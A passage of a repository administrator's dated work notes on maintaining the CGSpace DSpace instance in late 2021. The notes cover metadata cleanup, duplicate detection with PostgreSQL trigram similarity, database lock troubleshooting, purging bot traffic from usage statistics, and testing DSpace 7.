```console
localhost/dspace63= > \COPY (SELECT collection_id,uuid FROM collection WHERE collection_id IS NOT NULL) TO /tmp/2021-09-23-collection-id2uuid.csv WITH CSV HEADER;
COPY 1139
```
## 2021-09-24
- Peter and Abenet agreed that we should consider converting more of our UPPER CASE metadata values to Title Case
- It seems that these fields are all still using UPPER CASE:
- cg.subject.alliancebiovciat
- cg.species.breed
- cg.subject.bioversity
- cg.subject.ccafs
- cg.subject.ciat
- cg.subject.cip
- cg.identifier.iitatheme
- cg.subject.iita
- cg.subject.ilri
- cg.subject.pabra
- cg.river.basin
- cg.coverage.subregion (done)
- dcterms.audience (done)
- cg.subject.wle
- We can do some of these without even asking anyone, for example `cg.coverage.subregion`, `cg.river.basin`, and `dcterms.audience`
- First, I will look at `cg.coverage.subregion`
- These should ideally come from ISO 3166-2 subdivisions
- I will sentence case them and then create a controlled vocabulary from those that are matching (and worry about cleaning the rest up later)
```console
localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=231;
UPDATE 2903
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.coverage.subregion" FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 231) to /tmp/2021-09-24-subregions.txt;
COPY 1200
```
- Then I process the list for matches with my `subdivision-lookup.py` script, and extract only the values that matched:
```console
$ ./ilri/subdivision-lookup.py -i /tmp/2021-09-24-subregions.txt -o /tmp/subregions.csv
$ csvgrep -c matched -m 'true' /tmp/subregions.csv | csvcut -c 1 | sed 1d > /tmp/subregions-matched.txt
$ wc -l /tmp/subregions-matched.txt
81 /tmp/subregions-matched.txt
```
- Then I updated the controlled vocabulary in the submission forms
- I did the same for `dcterms.audience`, taking special care to a few all-caps values:
```console
localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value != 'NGOS' AND text_value != 'CGIAR';
localhost/dspace63= > UPDATE metadatavalue SET text_value='NGOs' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'NGOS';
```
- Update submission form comment for DOIs because it was still recommending people use the "dx.doi.org" format even though I batch updated all DOIs to the "doi.org" format a few times in the last year
- Then I updated all existing metadata to the new format again:
```console
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
UPDATE 49
```
## 2021-09-26
- Mohammed Salem told me last week that MELSpace and WorldFish have been upgraded to DSpace 6 so I updated the repository setup in AReS to use the UUID field instead of IDs
- This could explain how I had problems harvesting last week, when I only had 90,000 items...
- I started a fresh harvest on AReS
- I realized that the sitemap on MELSpace is missing so AReS skips it, which means we cannot harvest right now... ouch
- I sent a message to Salem and he fixed it quickly
- I added WorldFish's DSpace Statistics API instance to AReS before starting the plugins and now our numbers are much higher, nice!
## 2021-09-27
- Add CGIAR Action Area (cg.subject.actionArea) to CGSpace as Peter had asked me a few days ago
## 2021-09-28
- Francesca from the Alliance asked for help moving a bunch of reports from one collections to another on CGSpace
- She is having problems with the "move" dialog taking minutes for each item
- I exported the collection and sent her a copy with just the few fields she would need in order to mark the ones that need to move, then I can do the rest:
```console
$ csvcut -c 'id,collection,dc.title[en_US]' ~/Downloads/10568-106990.csv > /tmp/2021-09-28-alliance-reports.csv
```
- She sent it back fairly quickly with a new column marked "Move" so I extracted those items that matched and set them to the new owning collection:
```console
$ csvgrep -c Move -m 'Yes' ~/Downloads/2021_28_09_alliance_reports_csv.csv | csvcut -c 1,2 | sed 's_10568/106990_10568/111506_' > /tmp/alliance-move.csv
```
- Maria from the Alliance emailed us to say that approving submissions was slow on CGSpace
- I looked at the PostgreSQL activity and it seems low:
```console
postgres@linode18:~$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
59
```
- Locks look high though:
```console
postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | sort | uniq -c | wc -l
1154
```
- Indeed it seems something started causing locks to increase yesterday:
![PostgreSQL locks week](/cgspace-notes/2021/09/postgres_locks_ALL-week.png)
- And query length increasing since yesterday:
![PostgreSQL query length week](/cgspace-notes/2021/09/postgres_querylength_ALL-week.png)
- The number of DSpace sessions is normal, hovering around 1,000...
- Looking closer at the PostgreSQL activity log, I see the locks are all held by the `dspaceCli` user... which seem weird:
```console
postgres@linode18:~$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceCli';" | wc -l
1096
```
- Now I'm wondering why there are no connections from `dspaceApi` or `dspaceWeb`. Could it be that our Tomcat JDBC pooling via JNDI isn't working?
- I see the same thing on DSpace Test hmmmm
- The configuration in `server.xml` is correct, but it could be that when I changed to using the updated JDBC driver from `pom.xml` instead of dropping it in the Tomcat lib directory that something broke...
- I downloaded the latest JDBC jar and put it in Tomcat's lib directory on DSpace Test and after restarting Tomcat I can see connections from `dspaceWeb` and `dspaceApi` again
- I will do the same on CGSpace and then revert the JDBC change in Ansible and DSpace `pom.xml`
## 2021-09-29
- Export a list of ILRI subjects from CGSpace to validate against AGROVOC for Peter and Abenet:
```console
localhost/dspace63= > \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 203) to /tmp/2021-09-29-ilri-subject.txt;
COPY 149
```
- Then validate and format the matches:
```console
$ ./ilri/agrovoc-lookup.py -i /tmp/2021-09-29-ilri-subject.txt -o /tmp/2021-09-29-ilri-subjects.csv -d
$ csvcut -c subject,'match type' /tmp/2021-09-29-ilri-subjects.csv | sed -e 's/match type/matched/' -e 's/\(alt\|pref\)Label/yes/' > /tmp/2021-09-29-ilri-subjects2.csv
```
- I talked to Salem about depositing from MEL to CGSpace
- He mentioned that the one issue is that when you deposit to a workflow you don't get a Handle or any kind of identifier back!
- We might have to come to some kind of agreement that they deposit items without going into the workflow but that we have some kind of edit role in MEL
- He also said that they are looking into using the Research Organization Registry (RoR) in MEL, at least adding the `ror_id` and storing it
- I need to propose this to Peter again and perhaps start aligning our affiliations closer (I could even do something like the country codes with a process that scans every day)
- Talk to Moayad about OpenRXV
- We decided that we'd keep harvesting all the Handles from the Altmetric prefix API, but then have a plugin to retrive DOI scores that we can run manually
## 2021-09-30
- Look over 292 non-IWMI publications from Udana for inclusion into the Virtual library on water management collection on CGSpace
- I did some minor cleanup to remove blank columns and run it through the csv-metadata-quality tool
- I told him to add licenses and journal volume/issue and asked Abenet for input as well
<!-- vim: set sw=2 ts=2: -->

608
content/posts/2021-10.md Normal file
View File

@ -0,0 +1,608 @@
---
title: "October, 2021"
date: 2021-10-01T11:14:07+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2021-10-01
- Export all affiliations on CGSpace and run them against the latest RoR data dump:
```console
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
ations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
```
- So we have 1879/7100 (26.46%) matching already
<!--more-->
## 2021-10-03
- Dominique from IWMI asked me for information about how CGSpace partners are using CGSpace APIs to feed their websites
- Start a fresh indexing on AReS
- Udana sent me his file of 292 non-IWMI publications for the Virtual library on water management
- He added licenses
- I want to clean up the `dcterms.extent` field though because it has volume, issue, and pages there
- I cloned the column several times and extracted values based on their positions, for example:
- Volume: `value.partition(":")[0]`
- Issue: `value.partition("(")[2].partition(")")[0]`
- Page: `"p. " + value.replace(".", "")`
## 2021-10-04
- Start looking at the last month of Solr statistics on CGSpace
- I see a number of IPs with "normal" user agents who clearly behave like bots
- 198.15.130.18: 21,000 requests to /discover with a normal-looking user agent, from ASN 11282 (SERVERYOU, US)
- 93.158.90.107: 8,500 requests to handle and browse links with a Firefox 84.0 user agent, from ASN 12552 (IPO-EU, SE)
- 193.235.141.162: 4,800 requests to handle, browse, and discovery links with a Firefox 84.0 user agent, from ASN 51747 (INTERNETBOLAGET, SE)
- 3.225.28.105: 2,900 requests to REST API for the CIAT Story Maps collection with a normal user agent, from ASN 14618 (AMAZON-AES, US)
- 34.228.236.6: 2,800 requests to discovery for the CGIAR System community with user agent `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`, from ASN 14618 (AMAZON-AES, US)
- 18.212.137.2: 2,800 requests to discovery for the CGIAR System community with user agent `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`, from ASN 14618 (AMAZON-AES, US)
- 3.81.123.72: 2,800 requests to discovery and handles for the CGIAR System community with user agent `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`, from ASN 14618 (AMAZON-AES, US)
- 3.227.16.188: 2,800 requests to discovery and handles for the CGIAR System community with user agent `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`, from ASN 14618 (AMAZON-AES, US)
- Looking closer into the requests with this Mozilla/4.0 user agent, I see 500+ IPs using it:
```console
# zcat --force /var/log/nginx/*.log* | grep 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' | awk '{print $1}' | sort | uniq > /tmp/mozilla-4.0-ips.txt
# wc -l /tmp/mozilla-4.0-ips.txt
543 /tmp/mozilla-4.0-ips.txt
```
- Then I resolved the IPs and extracted the ones belonging to Amazon:
```console
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/mozilla-4.0-ips.txt -k "$ABUSEIPDB_API_KEY" -o /tmp/mozilla-4.0-ips.csv
$ csvgrep -c asn -m 14618 /tmp/mozilla-4.0-ips.csv | csvcut -c ip | sed 1d | tee /tmp/amazon-ips.txt | wc -l
```
- I am thinking I will purge them all, as I have several indicators that they are bots: mysterious user agent, IP owned by Amazon
- Even more interesting, these requests are weighted VERY heavily on the CGIAR System community:
```console
1592 GET /handle/10947/2526
1592 GET /handle/10947/2527
1592 GET /handle/10947/34
1593 GET /handle/10947/6
1594 GET /handle/10947/1
1598 GET /handle/10947/2515
1598 GET /handle/10947/2516
1599 GET /handle/10568/101335
1599 GET /handle/10568/91688
1599 GET /handle/10947/2517
1599 GET /handle/10947/2518
1599 GET /handle/10947/2519
1599 GET /handle/10947/2708
1599 GET /handle/10947/2871
1600 GET /handle/10568/89342
1600 GET /handle/10947/4467
1607 GET /handle/10568/103816
290382 GET /handle/10568/83389
```
- Before I purge all those I will ask someone Samuel Stacey from the System Office to hopefully get an insight...
- Meeting with Michael Victor, Peter, Jane, and Abenet about the future of repositories in the One CGIAR
- Meeting with Michelle from Altmetric about their new CSV upload system
- I sent her some examples of Handles that have DOIs, but no linked score (yet) to see if an association will be created when she uploads them
```csv
doi,handle
10.1016/j.agsy.2021.103263,10568/115288
10.3389/fgene.2021.723360,10568/115287
10.3389/fpls.2021.720670,10568/115285
```
- Extract the AGROVOC subjects from IWMI's 292 publications to validate them against AGROVOC:
```console
$ csvcut -c 'dcterms.subject[en_US]' ~/Downloads/2021-10-03-non-IWMI-publications.csv | sed -e 1d -e 's/||/\n/g' -e 's/"//g' | sort -u > /tmp/agrovoc.txt
$ ./ilri/agrovoc-lookup.py -i /tmp/agrovoc-sorted.txt -o /tmp/agrovoc-matches.csv
$ csvgrep -c 'number of matches' -m '0' /tmp/agrovoc-matches.csv | csvcut -c 1 > /tmp/invalid-agrovoc.csv
```
## 2021-10-05
- Sam put me in touch with Dodi from the System Office web team and he confirmed that the Amazon requests are not theirs
- I added `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)` to the list of bad bots in nginx
- I purged all the Amazon IPs using this user agent, as well as the few other IPs I identified yesterday
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/robot-ips.txt -p
...
Total number of bot hits purged: 465119
```
## 2021-10-06
- Thinking about how we could check for duplicates before importing
- I found out that [PostgreSQL has a built-in similarity function](https://www.freecodecamp.org/news/fuzzy-string-matching-with-postgresql/):
```console
localhost/dspace63= > CREATE EXTENSION pg_trgm;
localhost/dspace63= > SELECT metadata_value_id, text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines') > 0.5;
metadata_value_id │ text_value │ dspace_object_id
───────────────────┼────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
3652624 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ b7f0bf12-b183-4b2f-bbd2-7a5697b0c467
3677663 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ fb62f551-f4a5-4407-8cdc-6bff6dac399e
(2 rows)
```
- I was able to find an exact duplicate for an IITA item by searching for its title (I already knew that these existed)
- I started working on a basic Python script to do this and managed to find an actual duplicate in the recent IWMI items
- I think I will check for similar titles, and if I find them I will print out the handles for verification
- I could also proceed to check other metadata like type because those shouldn't vary too much
- I ran my new `check-duplicates.py` script on the 292 non-IWMI publications from Udana and found twelve potential duplicates
- Upon checking them manually, I found that 7/12 were indeed already present on CGSpace!
- This is with the similarity threshold at 0.5. I wonder if tweaking that higher will make the script run faster and eliminate some false positives
- I re-ran it with higher thresholds this eliminated all false positives, but it still took 24 minutes to run for 292 items!
- 0.6: ./ilri/check-duplicates.py -i ~/Downloads/2021-10-03-non-IWMI-publications.cs 0.09s user 0.03s system 0% cpu 24:40.42 total
- 0.7: ./ilri/check-duplicates.py -i ~/Downloads/2021-10-03-non-IWMI-publications.cs 0.12s user 0.03s system 0% cpu 24:29.15 total
- 0.8: ./ilri/check-duplicates.py -i ~/Downloads/2021-10-03-non-IWMI-publications.cs 0.09s user 0.03s system 0% cpu 25:44.13 total
- Some minor updates to csv-metadata-quality
- Fix two issues with regular expressions in the duplicate items and experimental language checks
- Add a check for items that have a DOI listed in their citation, but are missing a standalone DOI field
- Then I ran this new version of csv-metadata-quality on an export of IWMI's community, minus some fields I don't want to check:
```console
$ csvcut -C 'dc.date.accessioned,dc.date.accessioned[],dc.date.accessioned[en_US],dc.date.available,dc.date.available[],dc.date.available[en_US],dcterms.issued[en_US],dcterms.issued[],dcterms.issued,dc.description.provenance[en],dc.description.provenance[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dcterms.abstract[en_US],dcterms.bibliographicCitation[en_US],collection' ~/Downloads/iwmi.csv > /tmp/iwmi-to-check.csv
$ csv-metadata-quality -i /tmp/iwmi-to-check.csv -o /tmp/iwmi.csv | tee /tmp/out.log
$ xsv split -s 2000 /tmp /tmp/iwmi.csv
```
- I noticed each CSV only had 10 or 20 corrections, mostly that none of the duplicate metadata values were removed in the CSVs...
- I cut a subset of the fields from the main CSV and tried again, but DSpace said "no changes detected"
- The duplicates are definitely removed from the CSV, but DSpace doesn't detect them
- I realized this is an issue I've had before, but forgot because I usually use csv-metadata-quality for new items, not ones already inside DSpace!
- I found a comment on thread on the dspace-tech mailing list from helix84 in 2015 ("No changes were detected" when importing metadata via XMLUI") where he says:
> It's very likely that multiple values in a single field are being compared as an unordered set rather than an ordered list.
> Try doing it in two imports. In first import, remove all authors. In second import, add them in the new order.
- Shit, so that's worth looking into...
## 2021-10-07
- I decided to upload the cleaned IWMI community by moving the cleaned metadata field from `dcterms.subject[en_US]` to `dcterms.subject[en_Fu]` temporarily, uploading them, then moving them back, and uploading again
- I started by copying just a handful of fields from the iwmi.csv community export:
```console
$ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.iwmilibrary[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],cg.river.basin[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' ~/Downloads/iwmi.csv > /tmp/iwmi-duplicate-metadata.csv
# Copy and blank columns in OpenRefine
$ csv-metadata-quality -i ~/Downloads/2021-10-07-IWMI-duplicate-metadata-csv.csv -o /tmp/iwmi-duplicates-cleaned.csv | tee /tmp/out.log
$ xsv split -s 2000 /tmp /tmp/iwmi-duplicates-cleaned.csv
```
- It takes a few hours per 2,000 items because DSpace processes them so slowly... sigh...
## 2021-10-08
- I decided to update these records in PostgreSQL instead of via several CSV batches, as there were several others to normalize too:
```console
cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 2603711
en_Fu | 115568
en | 8818
| 5286
fr | 2
vn | 2
| 0
(7 rows)
cgspace=# BEGIN;
cgspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en_Fu', 'en', '');
UPDATE 129673
cgspace=# COMMIT;
```
- So all this effort to remove ~400 duplicate metadata values in the IWMI community hmmm:
```console
$ grep -c 'Removing duplicate value' /tmp/out.log
391
```
- I tried to export ILRI's community, but ran into the export bug (DS-4211)
- After applying the patch on my local instance I was able to export, but found many duplicate items in the CSV (as I also noticed in 2021-02):
```console
$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sed '1d' | wc -l
32070
$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed '1d' | wc -l
19315
```
- It seems there are only about 200 duplicate values in this subset of fields in ILRI's community:
```console
$ grep -c 'Removing duplicate value' /tmp/out.log
220
```
- I found a cool way to select only the items with corrections
- First, extract a handful of fields from the CSV with csvcut
- Second, clean the CSV with csv-metadata-quality
- Third, rename the columns to something obvious in the cleaned CSV
- Fourth, use csvjoin to merge the cleaned file with the original
```console
$ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' /tmp/ilri.csv | csvsort | uniq > /tmp/ilri-deduplicated-items.csv
$ csv-metadata-quality -i /tmp/ilri-deduplicated-items.csv -o /tmp/ilri-deduplicated-items-cleaned.csv | tee /tmp/out.log
$ sed -i -e '1s/en_US/en_Fu/g' /tmp/ilri-deduplicated-items-cleaned.csv
$ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cleaned.csv > /tmp/ilri-deduplicated-items-cleaned-joined.csv
```
- Then I imported the file into OpenRefine and used a custom text facet with a GREL like this to identify the rows with changes:
```
if(cells['dcterms.subject[en_US]'].value == cells['dcterms.subject[en_Fu]'].value,"same","different")
```
- For these rows I starred them and then blanked out the original field so DSpace would see it as a removal, and add the new column
- After these are uploaded I will normalize the `text_lang` fields in PostgreSQL again
- I did the same for CIAT but there were over 7,000 duplicate metadata values! Hard to believe:
```console
$ grep -c 'Removing duplicate value' /tmp/out.log
7720
```
- I applied these to the CIAT community, so in total that's over 8,000 duplicate metadata values removed in a handful of fields...
## 2021-10-09
- I did similar metadata cleanups for CCAFS and IITA too, but there were only a few hundred duplicates there
- Also of note, there are some other fixes too, for example in IITA's community:
```console
$ grep -c -E '(Fixing|Removing) (duplicate|excessive|invalid)' /tmp/out.log
249
```
- I ran a full Discovery re-indexing on CGSpace
- Then I exported all of CGSpace and extracted the ISSNs and ISBNs:
```console
$ csvcut -c 'id,cg.issn[en_US],dc.identifier.issn[en_US],cg.isbn[en_US],dc.identifier.isbn[en_US]' /tmp/cgspace.csv > /tmp/cgspace-issn-isbn.csv
```
- I did cleanups on about seventy items with invalid and mixed ISSNs/ISBNs
## 2021-10-10
- Start testing DSpace 7.1-SNAPSHOT to see if it has the duplicate item bug on `metadata-export` (DS-4211)
- First create a new PostgreSQL 13 container:
```console
$ podman run --name dspacedb13 -v dspacedb13_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5433:5432 -d postgres:13-alpine
$ createuser -h localhost -p 5433 -U postgres --pwprompt dspacetest
$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
$ psql -h localhost -p 5433 -U postgres dspace7 -c 'CREATE EXTENSION pgcrypto;'
```
- Then edit setting in `dspace/config/local.cfg` and build the backend server with Java 11:
```console
$ mvn package
$ cd dspace/target/dspace-installer
$ ant fresh_install
# fix database not being fully ready, causing Tomcat to fail to start the server application
$ ~/dspace7/bin/dspace database migrate
```
- Copy Solr configs and start Solr:
```console
$ cp -Rv ~/dspace7/solr/* ~/src/solr-8.8.2/server/solr/configsets
$ ~/src/solr-8.8.2/bin/solr start
```
- Start my local Tomcat 9 instance:
```console
$ systemctl --user start tomcat9@dspace7
```
- This works, so now I will drop the default database and import a dump from CGSpace
```console
$ systemctl --user stop tomcat9@dspace7
$ dropdb -h localhost -p 5433 -U postgres dspace7
$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest superuser;'
$ pg_restore -h localhost -p 5433 -U postgres -d dspace7 -O --role=dspacetest -h localhost dspace-2021-10-09.backup
$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest nosuperuser;'
```
- Delete Atmire migrations and some others that were "unresolved":
```console
$ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';"
$ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');"
```
- Now DSpace 7 starts with my CGSpace data... nice
- The Discovery indexing still takes seven hours... fuck
- I tested the `metadata-export` on DSpace 7.1-SNAPSHOT and it still has the duplicate items issue introduced by DS-4211
- I filed a GitHub issue and notified nwoodward: https://github.com/DSpace/DSpace/issues/7988
- Start a full reindex on AReS
## 2021-10-11
- Start a full Discovery reindex on my local DSpace 6.3 instance:
```console
$ /usr/bin/time -f %M:%e chrt -b 0 ~/dspace63/bin/dspace index-discovery -b
Loading @mire database changes for module MQM
Changes have been processed
836140:6543.6
```
- So that's 1.8 hours versus 7 on DSpace 7, with the same database!
- Several users wrote to me that CGSpace was slow recently
- Looking at the PostgreSQL database I see connections look normal, but locks for `dspaceWeb` are high:
```console
$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
53
$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
1697
$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceWeb'" | wc -l
1681
```
- Looking at Munin, I see there are indeed a higher number of locks starting on the morning of 2021-10-07:
![PostgreSQL locks week](/cgspace-notes/2021/10/postgres_locks_ALL-week.png)
- The only thing I did on 2021-10-07 was import a few thousand metadata corrections...
- I restarted PostgreSQL (instead of restarting Tomcat), so let's see if that helps
- I filed [a bug for the DSpace 6/7 duplicate values metadata import issue](https://github.com/DSpace/DSpace/issues/7989)
- I tested the two patches for removing abandoned submissions from the workflow but unfortunately it seems that they are for the configurable aka XML workflow, and we are using the basic workflow
- I discussed PostgreSQL issues with some people on the DSpace Slack
- Looking at postgresqltuner.pl and https://pgtune.leopard.in.ua I realized that there were some settings that I hadn't changed in a few years that I probably need to re-evaluate
- For example, `random_page_cost` is recommended to be 1.1 in the PostgreSQL 10 docs (default is 4.0, but we use 1 since 2017 when it came up in Hacker News)
- Also, `effective_io_concurrency` is recommended to be "hundreds" if you are using an SSD (default is 1)
- I also enabled the `pg_stat_statements` extension to try to understand what queries are being run the most often, and how long they take
## 2021-10-12
- I looked again at the duplicate items query I was doing with trigrams recently and found a few new things
- Looking at the `EXPLAIN ANALYZE` plan for the query I noticed it wasn't using any indexes
- I [read on StackExchange](https://dba.stackexchange.com/questions/103821/best-index-for-similarity-function/103823) that, if we want to make use of indexes, we need to use the similarity operator (`%`), not the function `similarity()` because "index support is bound to operators in Postgres, not to functions"
- A note about the query plan output is that we need to read it from the bottom up!
- So with the similary operator we need to set the threshold like this now:
```console
localhost/dspace= > SET pg_trgm.similarity_threshold = 0.5;
```
- Next I experimented with using GIN or GiST indexes on `metadatavalue`, but they were slower than the existing DSpace indexes
- I tested a few variations of the query I had been using and found it's _much_ faster if I use the similarity operator and keep the condition that object IDs are in the item table...
```console
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
Time: 739.948 ms
```
- Now this script runs in four minutes (versus twenty-four!) and it still finds the same seven duplicates! Amazing!
- I still don't understand the differences in the query plan well enough, but I see it is using the DSpace default indexes and the results are accurate
- So to summarize, the best to the worst query, all returning the same result:
```console
localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
Time: 683.165 ms
Time: 635.364 ms
Time: 674.666 ms
localhost/dspace= > DISCARD ALL;
localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
Time: 1584.765 ms (00:01.585)
Time: 1665.594 ms (00:01.666)
Time: 1623.726 ms (00:01.624)
localhost/dspace= > DISCARD ALL;
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
Time: 4028.939 ms (00:04.029)
Time: 4022.239 ms (00:04.022)
Time: 4061.820 ms (00:04.062)
localhost/dspace= > DISCARD ALL;
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
Time: 4358.713 ms (00:04.359)
Time: 4301.248 ms (00:04.301)
Time: 4417.909 ms (00:04.418)
```
## 2021-10-13
- I looked into the [REST API issue where fields without qualifiers throw an HTTP 500](https://github.com/DSpace/DSpace/issues/7946)
- The fix is to check if the qualifier is not null AND not empty in dspace-api
- I submitted a fix: https://github.com/DSpace/DSpace/pull/7993
## 2021-10-14
- Someone in the DSpace community already posted a fix for the DSpace 6/7 duplicate items export bug!
- I tested it and it works so I left feedback: https://github.com/DSpace/DSpace/pull/7995
- Altmetric support got back to us about the missing DOIHandle link and said it was due to the TLS certificate chain on CGSpace
- I checked and everything is actually working fine, so it could be their backend servers are old and don't support the new Let's Encrypt trust path
- I asked them to put me in touch with their backend developers directly
## 2021-10-17
- Revert the ssl-cert change on the Ansible infrastructure scripts so that nginx uses a manually generated "snakeoil" TLS certificate
- The ssl-cert one is easier because it's automatic, but they include the hostname in the bogus cert so it's an unecessary leak of information
- I started doing some tests to upgrade Elasticsearch from 7.6.2 to 7.7, 7.8, 7.9, and eventually 7.10 on OpenRXV
- I tested harvesting, reporting, filtering, and various admin actions with each version and they all worked fine, with no errors in any logs as far as I can see
- This fixes bunches of issues, updates Java from 13 to 15, and the base image from CentOS 7 to 8, so it's a decent amount of technical debt!
- I even tried Elasticsearch 7.13.2, which has Java 16, and it works fine...
- I submitted a pull request: https://github.com/ilri/OpenRXV/pull/126
## 2021-10-20
- Meeting with Big Data and CGIAR repository players about the feasibility of moving to a single repository
- We discussed several options, for example moving all DSpaces to CGSpace along with their permanent identifiers
- The issue would be for centers like IFPRI who don't use DSpace and have integrations with their website etc with their current repository
## 2021-10-21
